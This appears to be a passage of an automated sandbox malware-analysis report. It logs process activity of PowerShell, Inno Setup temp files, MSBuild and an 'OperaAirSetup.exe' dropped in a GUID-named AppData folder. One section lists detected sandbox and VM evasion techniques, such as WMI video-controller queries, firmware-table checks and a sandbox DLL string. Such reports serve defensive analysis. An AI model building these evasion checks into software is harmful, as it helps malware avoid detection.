Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: OperaAirSetup.exe, 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Memory allocated: 3000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Memory allocated: 3370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Memory allocated: 3280000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6466	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3276	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 1056	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\bassenc_ogg.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-JNHPI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-UDKGG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\VBoxProxyStub.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-JLLE4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\difxapi.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\Microsoft.Azure.Management.ResourceManager.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-40U72.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-SBTFQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\7za.dll (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe

Evaded block: after key decision

graph_12-45332

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe

API coverage: 6.3 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3064	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5648	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
